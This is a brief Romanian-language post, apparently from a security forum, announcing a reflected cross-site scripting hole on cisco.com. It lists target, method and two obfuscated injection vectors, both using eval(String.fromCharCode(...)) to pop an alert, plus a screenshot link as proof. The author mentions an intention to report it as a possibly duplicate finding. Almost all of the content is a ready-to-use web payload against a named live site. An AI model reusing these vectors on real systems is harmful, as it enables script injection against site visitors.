Target:cisco.com Exploit:Cross site scripting Type:Reflected Method:GET Vector folosit: -" %6fnmouseover="eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 100, 97, 110, 121, 119, 101, 98, 48, 57, 39, 41)) - sau <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 100, 97, 110, 121, 119, 101, 98, 48, 57, 39, 41))<%2fscript> P.o.C http://s15.postimg.org/xdok4bf4a/cisco1.jpg -Am sa il raportez desi sunt sigur 80% ca e dublicate